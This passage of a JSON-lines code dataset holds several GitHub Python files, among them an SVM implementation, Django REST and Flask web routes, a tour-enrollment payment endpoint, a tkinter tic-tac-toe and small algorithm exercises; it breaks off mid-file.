0.5, useGaussKernel=False, gamma = 1) -> None:\n self.training_data = training_data.copy(deep=True)\n #Let's wrap in a bias term as the last column before the labels\n self.training_data.insert(len(self.training_data.columns) - 1, \"bias\", 1)\n\n self.y = np.array([self.training_data[output_column].to_numpy()])\n self.yarr = self.training_data[output_column].to_numpy()\n self.gamma = gamma\n self.useGaussKernel = useGaussKernel\n \n self.yarr = self.training_data[output_column].to_numpy()\n self.x = self.training_data.drop([output_column], axis=1).to_numpy()\n self.alphas = np.random.rand(len(self.x))\n self.bounds = [(0,C)] * len(self.alphas)\n\n self.output_column = output_column\n self.C = C\n\n cons = ({'type':'eq', 'fun':self.constraints})\n if useGaussKernel:\n print(\"building kernel\")\n self.xg = np.zeros((len(self.x), len(self.x)))\n for i in range(len(self.x)):\n xi = self.x[i]\n for j in range(len(self.x)):\n self.xg[i][j] = self.gaussKernelDual(xi, self.x[j])\n\n #self.xg = self.x.T.dot(np.sum(self.x.dot(self.x), axis=1))\n print(\"optimizing\")\n solution: OptimizeResult = minimize(fun=self.gaussObjective, x0=self.alphas, constraints=cons, bounds=self.bounds, method='SLSQP')\n else:\n solution: OptimizeResult = minimize(fun=self.objective, x0=self.alphas, constraints=cons, bounds=self.bounds, method='SLSQP')\n\n self.alphas = solution.x\n print(solution.message)\n self.w: np.ndarray = np.zeros(len(self.training_data.columns) - 1) \n \n # this part is slow but we only need to do it once!\n if not useGaussKernel:\n for a,yi,x in zip(self.alphas, self.training_data[output_column].to_numpy(), self.x):\n if a == 0:\n continue\n self.w = self.w + (a * yi) * x\n\n #self.w = (self.alphas * self.y * self.x).sum(axis=1)\n \n\n\n def get_label(self, row: Series):\n # row needs to be augmented to support the bias.\n rowArr = row.drop(self.output_column).to_numpy()\n rowArr = np.append(rowArr, 1)\n \n\n if self.useGaussKernel:\n #rowArr = np.asmatrix(rowArr)\n prediction = 0.0\n for i in range(len(self.alphas)):\n if self.alphas[i] == 0: \n continue\n prediction = prediction + self.alphas[i] * self.yarr[i] * self.C * self.gaussKernelDual(self.x[i], rowArr)\n\n output = prediction\n else:\n output = self.w.T.dot(rowArr)\n\n if output >= 0:\n return 1\n else:\n return -1","repo_name":"Atomic-Johnson/mllib","sub_path":"SVM/dualSVM.py","file_name":"dualSVM.py","file_ext":"py","file_size_in_byte":4043,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"37313884667","text":"from rest_framework import filters, status\nfrom rest_framework import generics\nfrom rest_framework.generics import GenericAPIView\nfrom rest_framework.parsers import MultiPartParser\nfrom rest_framework.response import Response\n\nfrom reefsource.apps.albums.models import UploadedFile, Album\nfrom reefsource.core.rest_framework.permissions import CustomPermission\nfrom .serializers import UploadedFileSerializer, AlbumSerializer, AlbumDetailSerializer, EmptyUploadedFileSerializer\n\n\nclass FileUploadView(generics.CreateAPIView):\n queryset = UploadedFile.objects.all()\n serializer_class = UploadedFileSerializer\n parser_classes = (MultiPartParser,)\n\n def __init__(self):\n super(__class__, self).__init__()\n self.albumId = None\n\n def get_queryset(self):\n queryset = super(__class__, self).get_queryset()\n queryset = queryset.filter(album__user=self.request.user)\n\n return queryset\n\n def create(self, request, albumId, *args, **kwargs):\n self.albumId = albumId\n return super(__class__, self).create(request, *args, **kwargs)\n\n def perform_create(self, serializer):\n params = {'album_id': self.albumId,\n 'original_filename': serializer.validated_data['file'].name,\n 'filesize': serializer.validated_data['file'].size,\n 'mime_type': serializer.validated_data['file'].content_type}\n\n serializer.save(**params)\n\n\nclass FileUploadViewDetailView(generics.RetrieveDestroyAPIView):\n queryset = UploadedFile.objects.all()\n serializer_class = UploadedFileSerializer\n\n def get_queryset(self):\n queryset = super(__class__, self).get_queryset()\n queryset = queryset.filter(album__user=self.request.user)\n\n return queryset\n\n\nclass FileUploadReanalyzePermission(CustomPermission):\n required_perms = ('reanalyze_result',)\n\n\nclass FileUploadReanalyzeView(GenericAPIView):\n queryset = UploadedFile.objects.all()\n serializer_class = EmptyUploadedFileSerializer\n permission_classes = (FileUploadReanalyzePermission,)\n\n def post(self, request, *args, **kwargs):\n instance = self.get_object()\n\n from reefsource.apps.results.models import Result\n Result.objects.filter(uploaded_file=instance).delete()\n\n instance.start_stage1()\n\n serializer = self.get_serializer(instance=instance)\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n\n\nclass AlbumApiMixin(object):\n queryset = Album.objects.all()\n serializer_class = AlbumSerializer\n\n def get_queryset(self):\n queryset = super(__class__, self).get_queryset()\n\n if not self.request.user.is_staff:\n queryset = queryset.filter(user=self.request.user)\n\n return queryset\n\n\nclass AlbumListView(AlbumApiMixin, generics.ListCreateAPIView):\n filter_backends = (filters.OrderingFilter, filters.SearchFilter,)\n ordering_fields = ('name', 'created', 'modified', 'date',)\n ordering = ('-date',)\n search_fields = ('name',)\n\n def perform_create(self, serializer):\n serializer.save(user=self.request.user)\n\n\nclass AlbumDetailView(AlbumApiMixin, generics.RetrieveUpdateDestroyAPIView):\n serializer_class = AlbumDetailSerializer\n","repo_name":"reefsource/reefsource","sub_path":"reefsource/apps/albums/api/v1/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3234,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"74080421314","text":"from flask import flash, make_response, render_template, redirect, request, session, url_for\nfrom acomp import app, db, loginmanager, sessions\nfrom flask_login import current_user, login_required, logout_user\nfrom urllib.parse import urlparse, urljoin\nfrom acomp.glUser import GLUser\nfrom acomp.auth import auth\n\nfrom acomp.forms import Captcha, Classic, Signup, Signin, SettingsUserName, SettingsChangePassword, \\\n SettingsDeleteAccount\nimport json\n\nloginmanager.login_view = 'login'\n\n\ndef is_safe_url(target):\n \"\"\" https://web.archive.org/web/20120517003641/http://flask.pocoo.org/snippets/62/ \"\"\"\n ref_url = urlparse(request.host_url)\n test_url = urlparse(urljoin(request.host_url, target))\n return test_url.scheme in ('http', 'https') and \\\n ref_url.netloc == test_url.netloc\n\n\n@app.route('/classic')\n@login_required\ndef classic():\n form = Classic()\n usr = GLUser(current_user.get_id())\n user_name = usr.getName()\n img = usr.startClassic()\n return render_template('classic.html', source=img['images'], form=form, username=user_name)\n\n\n@app.route('/classic/data', methods=['GET'])\n@login_required\ndef classic_data_get():\n usr = GLUser(current_user.get_id())\n try:\n data = usr.startClassic()\n app.logger.debug(data)\n res = make_response(json.dumps(data))\n except Exception as e:\n return bad_request(e)\n else:\n res.headers.set('Content-Type', 'application/json')\n return res\n\n\n@app.route('/classic/data', methods=['POST'])\n@login_required\ndef classic_data_post():\n data = request.get_json()\n if data is None:\n return bad_request('Invalid JSON.')\n if 'tag' not in data:\n return bad_request('Missing key in JSON.')\n else:\n usr = GLUser(current_user.get_id())\n try:\n tag = usr.tagImage(data['tag'])\n except Exception as e:\n return bad_request(e)\n else:\n res_data = {'accepted': tag[0], 'message': tag[1], 'score': tag[2]}\n res = make_response(res_data)\n res.headers.set('Content-Type', 'application/json')\n return res\n\n\n@app.route('/captcha')\n@login_required\ndef captcha():\n form = Captcha()\n usr = GLUser(current_user.get_id())\n user_name = usr.getName()\n try:\n images = usr.startCaptcha()\n return render_template('captcha.html', source=images['images'], form=form, username=user_name)\n except Exception as e:\n flash('Currently there are not enough tagged images in our DB to play Captcha.'\n 'Please play the classic mode and try again later.')\n return render_template('captcha.html', source=images['images'], form=form, username=user_name)\n\n\n@app.route('/captcha/data', methods=['GET'])\n@login_required\ndef captcha_get():\n usr = GLUser(current_user.get_id())\n try:\n data = usr.startCaptcha()\n app.logger.debug(data)\n res = make_response(json.dumps(data))\n except Exception as e:\n return bad_request(e)\n else:\n res.headers.set('Content-Type', 'application/json')\n return res\n\n\n@app.route('/captcha/data', methods=['POST'])\n@login_required\ndef captcha_post():\n data = request.get_json()\n if data is None:\n return bad_request('Invalid JSON.')\n if 'joker' in data:\n usr = GLUser(current_user.get_id())\n try:\n wrng_images = usr.jokerCaptcha()\n except Exception as e:\n return bad_request(e)\n else:\n res_data = {\"message\": wrng_images}\n res = make_response(json.dumps(res_data))\n res.headers.set('Content-Type', 'application/json')\n return res\n if 'captcha' in data:\n usr = GLUser(current_user.get_id())\n try:\n captcha = usr.capCaptcha(data['captcha'])\n except Exception as e:\n return bad_request(e)\n else:\n res_data = {'accepted': captcha[0], 'message': captcha[1], 'score': captcha[2]}\n res = make_response(res_data)\n res.headers.set('Content-Type', 'application/json')\n return res\n else:\n return bad_request('Missing key in JSON.')\n\n\n@app.route('/quiz')\ndef quiz():\n if current_user.is_authenticated:\n return redirect(url_for('tutorial'))\n if 'quiz' not in session:\n session['quiz'] = 0\n if session['quiz'] >= app.config['ACOMP_QUIZ_POINTS']:\n flash('Congrats, you have reached enough points!')\n form = Captcha()\n usr = GLUser(-1)\n try:\n images = usr.startCaptcha()\n app.logger.debug('Current quiz score: {}'.format(session['quiz']))\n return render_template('captcha.html', source=images['images'], form=form)\n except:\n session['quiz'] = app.config['ACOMP_QUIZ_POINTS']\n flash('There are currently not enough tagged images in the database for the entry quiz. You may signup directly.')\n return redirect(url_for('signup'))\n\n\n@app.route('/quiz/data', methods=['GET'])\ndef quiz_get():\n if 'quiz' not in session:\n return forbidden('Not authorized.')\n if session['quiz'] >= app.config['ACOMP_QUIZ_POINTS']:\n flash('Congrats, you have reached enough points!')\n\n usr = GLUser(-1)\n try:\n data = usr.startCaptcha()\n app.logger.debug(data)\n res = make_response(json.dumps(data))\n except Exception as e:\n return bad_request(e)\n else:\n res.headers.set('Content-Type', 'application/json')\n return res\n\n\n@app.route('/quiz/data', methods=['POST'])\ndef quiz_post():\n if 'quiz' not in session:\n return forbidden('Not authorized.')\n\n data = request.get_json()\n if data is None:\n return bad_request('Invalid JSON.')\n if 'captcha' not in data:\n return bad_request('Missing key in JSON.')\n else:\n usr = GLUser(-1)\n try:\n challange, captcha = usr.capEntryQuiz(data['captcha'])\n except Exception as e:\n return bad_request(e)\n else:\n session['quiz'] += 1 if challange == 1 else -1\n signup_permission = int(session['quiz'] >= app.config['ACOMP_QUIZ_POINTS'])\n\n data = {'OK': signup_permission, 'message': captcha[0]}\n res = make_response(data)\n res.headers.set('Content-Type', 'application/json')\n return res\n\n\n@app.route('/tutorial')\ndef tutorial():\n form = Classic()\n return render_template('tutorial.html', source='../static/img/tutorial_1.jpg', form=form)\n\n\n@app.route('/signup', methods=['GET', 'POST'])\ndef signup():\n if current_user.is_authenticated:\n return redirect(url_for('settings'))\n form = Signup()\n if 'quiz' not in session:\n return redirect('quiz')\n elif session['quiz'] < app.config['ACOMP_QUIZ_POINTS']:\n return redirect('quiz')\n elif form.validate_on_submit():\n auth.register(form.loginname.data, form.loginpswd.data, form.loginpswdConfirm.data)\n auth.login(form.loginname.data, form.loginpswd.data)\n return redirect(url_for('tutorial'))\n app.logger.debug('Current quiz score: {}'.format(session['quiz']))\n return render_template('signup.html', form=form)\n\n\n@app.route('/signup/data', methods=['POST'])\n@app.route('/settings/data', methods=['POST'])\ndef signup_post():\n data = request.get_json()\n if data is None:\n return bad_request('Invalid JSON.')\n if 'name' not in data:\n return bad_request('Missing key in JSON.')\n else:\n if (auth.exists(data['name'])):\n res = make_response('{\"available\":\"0\", \"message\":\"Username not available\"}')\n else:\n res = make_response('{\"available\":\"1\", \"message\":\"Username available\"}')\n res.headers.set('Content-Type', 'application/json')\n return res\n\n\n@app.route('/', methods=['GET', 'POST'])\n@app.route('/login', methods=['GET', 'POST'])\ndef login():\n if current_user.is_authenticated:\n return redirect(url_for('settings'))\n form = Signin()\n if form.validate_on_submit():\n try:\n app.logger.debug('Login user name {}'.format(form.loginname.data))\n usr_id = auth.login(form.loginname.data, form.loginpswd.data)\n if usr_id > 0:\n app.logger.debug('Login user id {}'.format(usr_id))\n app.logger.debug('Current user id {}'.format(current_user.get_id()))\n target = request.args.get('next')\n if not is_safe_url(target):\n return bad_request('Could not redirect to ' + target)\n else:\n return redirect(url_for('classic'))\n except Exception as e:\n flash(e)\n return render_template('login.html', form=form)\n\n\n@app.route('/logout')\n@login_required\ndef logout():\n logout_user()\n return redirect(url_for('login'))\n\n\n@app.route('/settings', methods=['GET', 'POST'])\n@login_required\ndef settings():\n nameform = SettingsUserName()\n passwordform = SettingsChangePassword()\n deleteform = SettingsDeleteAccount()\n usr = GLUser(current_user.get_id())\n user_name = usr.getName()\n\n if nameform.validate_on_submit():\n try:\n app.logger.debug('Change name to {}'.format(nameform.newloginname.data))\n usrname = auth.changename(current_user.get_id(), nameform.newloginname.data, nameform.loginpswd.data)\n flash('Name change successful.')\n app.logger.debug('Current user id {}'.format(current_user.get_id()))\n app.logger.debug('Name change for {}'.format(usrname))\n except Exception as e:\n flash(e)\n\n if passwordform.validate_on_submit():\n try:\n usr_id = auth.changetoken(current_user.get_id(), passwordform.oldpswd.data, passwordform.newpswd.data,\n passwordform.newpswdConfirm.data)\n if usr_id > 0:\n flash('Password change successful.')\n app.logger.debug('Current user id {}'.format(current_user.get_id()))\n app.logger.debug('Change password for {}'.format(usr_id))\n except Exception as e:\n flash(e)\n\n if deleteform.validate_on_submit():\n try:\n app.logger.debug('Delete user id {}'.format(current_user.get_id()))\n usrname = auth.delete(current_user.get_id(), deleteform.loginpswddelform.data)\n app.logger.debug('Deleted user {}'.format(usrname))\n flash('User deleted.')\n return redirect(url_for('login'))\n except Exception as e:\n flash(e)\n\n return render_template('settings.html', nameform=nameform, deleteform=deleteform, passwordform=passwordform,\n username=user_name)\n\n\n@app.route('/settings/data', methods=['GET'])\n@login_required\ndef opendata():\n usr = GLUser(current_user.get_id())\n try:\n data = usr.getOpenData()\n app.logger.debug(data)\n res = make_response(json.dumps(data))\n except Exception as e:\n return bad_request(e)\n else:\n res.headers.set('Content-Type', 'application/json')\n return res\n\n\n@app.route('/help')\ndef help():\n return render_template('help.html')\n\n\n@app.route('/highscore')\n@login_required\ndef highscore():\n usr = GLUser(current_user.get_id())\n user_name = usr.getName()\n return render_template('highscore.html', data=usr.getHighscore(), username=user_name)\n\n\n@app.errorhandler(400)\ndef bad_request(e):\n return render_template('4xx.html', error_msg=e), 400\n\n\n@app.errorhandler(401)\ndef forbidden(e):\n return render_template('4xx.html', error_msg=e), 401\n\n\n@app.errorhandler(404)\ndef page_not_found(e):\n return render_template('4xx.html', error_msg=e), 404\n","repo_name":"muesal/annotation-competition","sub_path":"src/acomp/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":11669,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"38437721001","text":"import json\n\nfrom flask import Blueprint, current_app\nfrom flask_jwt_extended import create_refresh_token, create_access_token, get_jwt_identity, jwt_required\nfrom flask import request, jsonify\nfrom app.handlers import APIException\nfrom app.database.db import cursor, lastrowid\nimport requests\n\nbp = Blueprint(\"new_enrollment\", __name__, url_prefix=\"/enrollments\")\n\n\n@bp.route(\"/enrollment\", methods=[\"POST\"])\n@jwt_required(optional=True)\ndef create_new_enrollment():\n body = request.json\n user_id = get_jwt_identity()\n\n # Check if user is already signed to that tour\n if user_id:\n cursor().execute(f\"SELECT id FROM enrollments WHERE tour_id=%s AND user_id=%s\", (body[\"tour_id\"], user_id))\n res = cursor().fetchall()\n if res:\n raise APIException(msg=\"Ta wycieczka została już przez Ciebie wykupiona\", code=400)\n\n\n # Check if tour enrollment process is active\n cursor().execute(f\"SELECT * FROM tours WHERE id=%s AND NOW() < enrollment_deadline\", (body[\"tour_id\"], ))\n res = cursor().fetchall()\n if not res:\n raise APIException(msg=\"Okres zapisów tej wycieczki zakończył się\", code=400)\n tour_data = res[0]\n\n # Check if tour has available number of places\n cursor().execute(f\"SELECT sum(tickets) FROM enrollments WHERE tour_id=%s\", (body[\"tour_id\"], ))\n current_tickets = cursor().fetchone()[\"sum(tickets)\"]\n if current_tickets is None:\n current_tickets = 0\n person_limit = tour_data[\"person_limit\"]\n if current_tickets >= person_limit: # <-- checking if there are any available tickets\n raise APIException(msg=\"Ilość miejsc w ofercie została wyczerpana\", code=400)\n\n # Check if user's amount of tickets will exceed the person limit\n if current_tickets+len(body[\"participants\"]) > person_limit:\n raise APIException(msg=f\"W ofercie pozostało tylko {person_limit-current_tickets} miejsc\", code=400)\n\n\n\n # Create new enrollment\n columns = f\"f_name, l_name, phone_number, email, user_id, tour_id, city, postcode, street, house_number, apartment_number, comment, amount_payable\"\n insert = {\n \"f_name\": body[\"f_name\"],\n \"l_name\": body[\"l_name\"],\n \"phone_number\": body[\"phone_number\"],\n \"email\": body[\"email\"],\n \"user_id\": user_id if user_id else None,\n \"tour_id\": body[\"tour_id\"],\n \"city\": body[\"city\"],\n \"postcode\": body[\"postcode\"],\n \"street\": body[\"street\"],\n \"house_number\": body[\"house_number\"],\n \"apartment_number\": body[\"apartment_number\"],\n \"comment\": body[\"comment\"],\n \"amount_payable\": body[\"amount_payable\"]\n }\n cursor().execute(f\"INSERT INTO enrollments ({columns}) VALUES (%(f_name)s, %(l_name)s, %(phone_number)s, %(email)s, %(user_id)s, %(tour_id)s, %(city)s, %(postcode)s, %(street)s, %(house_number)s, %(apartment_number)s, %(comment)s, %(amount_payable)s)\", insert)\n enrollment_id = lastrowid()\n\n # Add participants to enrollment_participants table\n for full_name in body[\"participants\"]:\n cursor().execute(f\"INSERT INTO enrollment_participants (enrollment_id, full_name) VALUES (%s, %s)\", (enrollment_id, full_name))\n\n\n\n ### Make request to bitpay API ###\n url = \"https://test.bitpay.com/invoices\"\n token = current_app.config[\"BITPAY_SECRET_KEY\"]\n body = {\n \"token\": token,\n \"price\": body[\"amount_payable\"], # TODO change it to body[\"amount_payable\"], low value for now, for testing\n \"currency\": \"PLN\",\n \"itemDesc\": \"Zakup wycieczki\", #TODO It can be modified to tour's title\n \"notificationURL\": \"https://figlus.pl/api/payment/bitpay\",\n \"redirectURL\": \"https://figlus.pl/payment/success\",\n \"closeURL\": \"https://figlus.pl/payment/revoked\",\n \"posData\": json.dumps({\n \"enrollment_id\": enrollment_id,\n \"amount_payable\": body[\"amount_payable\"]\n }),\n \"transactionSpeed\": \"high\",\n \"fullNotifications\": False\n }\n headers = {\n \"Content-Type\": \"application/json\",\n \"X-Accept-Version\": \"2.0.0\"\n }\n\n response = requests.post(url, body, headers)\n res = response.json()\n\n payload = {\n \"url\": res[\"data\"][\"url\"]\n }\n\n response = jsonify(msg=f\"Zapis przebiegł pomyslnie + {current_tickets} \", payload=payload)\n return response, 200","repo_name":"navuyi/Praca-Inzynierska-2022","sub_path":"BACKEND/API/endpoints/enrollments/enrollment_post.py","file_name":"enrollment_post.py","file_ext":"py","file_size_in_byte":4337,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72489898434","text":"import sys\ninput = sys.stdin.readline\n\n# 파싱\na, b = map(int, input().split())\na -= 1\nb -= 1\n\n# 계산\nax, ay = a // 4, a % 4\nbx, by = b // 4, b % 4\n\n# 결과 출력\nprint(abs(ax - bx) + abs(ay - by))\n","repo_name":"Lairin-pdj/coding_test","sub_path":"baekjoon/1598_꼬리를 무는 숫자 나열.py","file_name":"1598_꼬리를 무는 숫자 나열.py","file_ext":"py","file_size_in_byte":203,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"7381251298","text":"\nfrom tkinter import *\nfrom functools import partial\nimport tictactoe as ttt\n\nwindow = Tk()\n\nfield = [\n['_','_','_'],\n['_','_','_'],\n['x','_','0']]\n\n#todo убрать отладочную печать из другого файла и изменить цвет кнопок или текста \n\n# погуглить hello world на c и как его скомпилировать \n# погуглить про вим, базовый синтаксис C \n# занятие в вим \n\n\n# после mainloop выполняется только эта штука \ndef click(i,j):\n\tglobal field\n\tfield[i][j]='x'\n\tdraw_new_turn(field)\n\tfield = ttt.next_turn(field, '0')\n\tdraw_new_turn(field)\n\n\tprint(ttt.state(field))\n\n\n\n# drawing field\nbuttons_list = []\nfor i in range(3):\n buttons_list.append([])\n for j in range(3):\n button = Button(master=window, text=field[i][j], \n \tcommand = partial(click, i, j), \n \thighlightbackground = 'white',\n \tstate = DISABLED if (field[i][j] == 'x' or field[i][j] == '0') else NORMAL)\n button.grid(row=i, column=j)\n buttons_list[i].append(button)\n\nprint(buttons_list)\ndef draw_new_turn(field):\n\tfor i in range(3):\n\t\tfor j in range(3):\n\t\t\tbuttons_list[i][j]['text']=field[i][j]\n\t\t\tbuttons_list[i][j]['state']= DISABLED if (field[i][j] == 'x' or field[i][j] == '0') else NORMAL\n\n\n\n\n\n# отрисовка новой кнопки после нажатия \n# draw_new_turn([\n# ['x','x','0'],\n# ['0','x','_'],\n# ['x','_','0']])\n\n\n\n \n\n# def click(i,j):\n# \tdef indexes():\n# \t\tprint('indexes', i, j)\n# \treturn indexes\n\n\n# # drawing field\n# for i in range(3):\n# for j in range(3):\n# button = Button(master=window, text=field[i][j], command = click(i,j))\n# button.grid(row=i, column=j)\n\n\n# \ndef handle_click(event): # here should be indexes\n\tpass\n\n# button = tk.Button(text=\"Click me!\")\n\n# button.bind(\"\", handle_click)\n\nnew_field = None \n# changing element of field according indexes of pushed button\n\n\nwindow.mainloop()\n\n\n# for i in range(3):\n# for j in range(3):\n# frame = Frame( \n# master=window,\n# #relief = 'groove',\n# borderwidth=1,\n# # height = 4\n# )\n# frame.grid(row=i, column=j)\n# button = Button(master=frame, text=f\"Row {i}\\nColumn {j}\")\n# button.pack()\n\n\n# btn2 = Button()\n# btn2.pack\n\n\n# field = Label(text = 'Tic Tac Toe', \n# \tfg=\"white\",\n# bg=\"black\",\n# width=60,\n# height=60)\n\n# # frame1 = Frame(master=window, width=100, height=100, bg=\"red\")\n# # frame1.pack()\n\n# button = Button(\n# text=\"Click me!\",\n# width=25,\n# height=5,\n# bg='black',\n# fg=\"white\",\n# )\n\n# field.pack()\n# button.pack()\n\n\n\n\n# b=Button(t,text=\"hello\")\n\n# window = t.mainloop()\n\n","repo_name":"rudykas/edu","sub_path":"interface_ttt.py","file_name":"interface_ttt.py","file_ext":"py","file_size_in_byte":2793,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"22175869384","text":"import numpy as np\nimport numpy.linalg as la\nimport argparse\nimport csv\nnp.version.version\ntrain_data \t= np.genfromtxt('propublicaTrain.csv', usecols=(1,2,3,4,5,6,7,8,9),skip_header = 1, dtype = 'int8',delimiter=',')\ntrain_label\t= np.genfromtxt('propublicaTrain.csv', usecols=(0), skip_header = 1, dtype = 'int8',delimiter=',')\n\ntest_data \t= np.genfromtxt('propublicaTest.csv', usecols=(1,2,3,4,5,6,7,8,9),skip_header = 1, dtype = 'int8',delimiter=',')\ntest_label \t= np.genfromtxt('propublicaTest.csv', usecols=(0), skip_header = 1, dtype = 'int8',delimiter=',')\n\ntrain_num,_ = train_data.shape\ntest_num,_ = test_data.shape\ntest_data_0 = test_data[test_data[:,2] == 0]\ntest_data_1 = test_data[test_data[:,2] == 1]\nprint(test_data_0.shape)\nprint(test_data_1.shape)\n\n\nparser = argparse.ArgumentParser(description = 'knn classifier')\nparser.add_argument('-k', '--k', type = int, default =3, help = \"Hyper parameter k\")\nparser.add_argument('-n', '--norm', type = int, default =2, help = \"Hyper parameter norm\")\nargs = parser.parse_args()\n\n\n\n# print(train_data.shape,train_label.shape, test_data.shape,test_label.shape)\nk=args.k\nif args.norm<0:\n\tnorm_order = np.inf\nelse:\n\tnorm_order = args.norm\nhalf = int(k/2)\n\n\n\nm,n = test_data_0.shape\ncount_0 = [0,0,0]\nfor i in range(m):\n\tdiff = np.subtract(train_data,test_data_0[i])\n\tnorm = la.norm(diff, ord = norm_order, axis = 1)\n\ttemp = np.argsort(norm)\n\ttemp = temp[0:k]\n\n\tlabel_1 = 0\n\tfor x in temp:\n\t\tif train_label[x].item(0)>0:\n\t\t\tlabel_1+=1\n\tpredict_label = 0\n\tif label_1> half:\n\t\tpredict_label = 1\n\tif predict_label==0:\n\t\tcount_0[0]+=1\n\tif test_label[i].item(0) ==0:\n\t\tcount_0[2]+=1\n\tif test_label[i].item(0) == 0 and predict_label ==0:\n\t\tcount_0[1]+=1\n\nDP_0 = count_0[0]/m\nEO_0 = count_0[1]/count_0[2]\nPP_0 = count_0[1]/count_0[0]\nprint(\"DP a=0:\",DP_0)\nprint(\"EO a=0:\",EO_0)\nprint(\"PP a=0:\",PP_0)\nprint(count_0)\n\n\nm,n = test_data_1.shape\ncount_1 = [0,0,0]\nfor i in range(m):\n\tdiff = np.subtract(train_data,test_data_1[i])\n\tnorm = la.norm(diff, ord = norm_order, axis = 1)\n\ttemp = np.argsort(norm)\n\ttemp = temp[0:k]\n\n\tlabel_1 = 0\n\tfor x in temp:\n\t\tif train_label[x].item(0)>0:\n\t\t\tlabel_1+=1\n\tpredict_label = 0\n\tif label_1> half:\n\t\tpredict_label = 1\n\tif predict_label==0:\n\t\tcount_1[0]+=1\n\tif test_label[i].item(0) ==0:\n\t\tcount_1[2]+=1\n\tif test_label[i].item(0) == 0 and predict_label ==0:\n\t\tcount_1[1]+=1\n\nDP_1 = count_1[0]/m\nEO_1 = count_1[1]/count_1[2]\nPP_1 = count_1[1]/count_1[0]\nprint(\"DP a=0:\",DP_1)\nprint(\"EO a=0:\",EO_1)\nprint(\"PP a=0:\",PP_1)\nprint(count_1)\n\nDP_fair = abs(DP_1-DP_0)\nEO_fair = abs(EO_1-EO_0)\nPP_fair = abs(PP_1-PP_0)\nprint(\"DP_fair: \",DP_fair)\nprint(\"EO_fair: \",EO_fair)\nprint(\"PP_fair: \",PP_fair)\n\nwith open('DP_result.csv', 'a') as f:\n\twriter = csv.writer(f)\n\twriter.writerow(['knn',DP_fair])\n\nwith open('EO_result.csv', 'a') as f:\n\twriter = csv.writer(f)\n\twriter.writerow(['knn',EO_fair])\n\nwith open('PP_result.csv', 'a') as f:\n\twriter = csv.writer(f)\n\twriter.writerow(['knn',PP_fair])\n\n\n\n","repo_name":"ChengShen1996/MachineLearning","sub_path":"hw1/knn-fair.py","file_name":"knn-fair.py","file_ext":"py","file_size_in_byte":2961,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"8394905236","text":"# https://leetcode.com/problems/maximum-units-on-a-truck\n# Oleg Belov\n\nclass Solution:\n def maximumUnits(self, boxTypes: List[List[int]], truckSize: int) -> int:\n boxTypes.sort(key=lambda x: x[1], reverse=True)\n units = 0\n for box_t in boxTypes:\n if box_t[0] <= truckSize:\n truckSize -= box_t[0]\n units += box_t[0] * box_t[1]\n else:\n units += truckSize * box_t[1]\n break\n return units","repo_name":"bgelov/python","sub_path":"built-ins/lambda/1710. Maximum Units on a Truck.py","file_name":"1710. Maximum Units on a Truck.py","file_ext":"py","file_size_in_byte":497,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"5261714156","text":"import cherrypy\nimport pywapi\nfrom mako.template import Template\n\ncherrypy.config.update({'server.socket_host': '0.0.0.0',\n 'server.socket_port': 8080,\n })\n\nclass HelloWorld:\n def index(self):\n tmpl = Template(filename='index.html')\n return tmpl.render(username=\"berg\")\n index.exposed = True\n\n def berg(self, area):\n the_weather = pywapi.get_weather_from_yahoo(area, \"\")\n \n tmpl = Template(filename='weather.html')\n tmpl_render = tmpl.render(\n conditions=the_weather['condition']['title'],\n cur_condition=the_weather['condition']['text'],\n cur_temp=the_weather['condition']['temp'],\n humidity=the_weather['atmosphere']['humidity'],\n pressure=the_weather['atmosphere']['pressure'],\n forecast_high=the_weather['forecasts'][1]['high'],\n forecast_low=the_weather['forecasts'][1]['low'], \n forecast_text = the_weather['forecasts'][1]['text'])\n\n return tmpl_render\n berg.exposed = True\n\ncherrypy.quickstart(HelloWorld())\n","repo_name":"mattinator/cherrypy-test","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1111,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72489201794","text":"def hanoi(n, start, temp, end):\n global answer\n \n # 1개 일경우 바로 옮김\n if n == 1:\n answer.append([start, end])\n # 그렇지 않을 경우 3단계로 나누어 옮김\n else:\n # 나머지를 임시 저장소로 옮김\n hanoi(n - 1, start, end, temp)\n # 제일 큰 기둥을 목적지로 옮김\n hanoi(1, start, temp, end)\n # 임시 저장소에 있는 기둥을 목적지로 옮김 \n hanoi(n - 1, temp, start, end)\n \n\ndef solution(n):\n global answer\n answer = []\n \n hanoi(n, 1, 2, 3)\n \n return answer\n","repo_name":"Lairin-pdj/coding_test_practice_programmers","sub_path":"하노이의 탑.py","file_name":"하노이의 탑.py","file_ext":"py","file_size_in_byte":598,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"31834473096","text":"from random import randint\nimport random\nimport math\n#print(random.sample(range(1, 18), 4) ) --→ [1, 7, 3, 11]\n\n\n# 1 список целых чисел от 0 до 999999\nspisok1 = [random.randint(0, 999999) for i in range(999999)]\n\n# 2 список из 99999 случайных вещественных чисел в диапазоне [-1, 1];\nspisok2 = [random.uniform(-1, 1) for i in range(999999)]\n\n# 3 42000 разных точки комплексной плоскости, лежащие в пределах окружности радиуса radius=20/2=10\nparam = 2 * math.pi / 42000\nplane_of_points = []\nfor i in range(42000):\n r1 = 10 * math.cos(i * param)\n r2 = 10 * math.sin(i * param)\n plane_of_points.append((r1, r2))\n\n\n# 4 книга\nwith open('elegance.txt', 'r', encoding = 'utf-8') as doc:\n book = doc.read().lower()\nlist_of_text = book.split()\n\n# 1 сортировка перемешиванием\ndef shaker_sort(arr):\n\n for i in range(1, len(arr)):\n 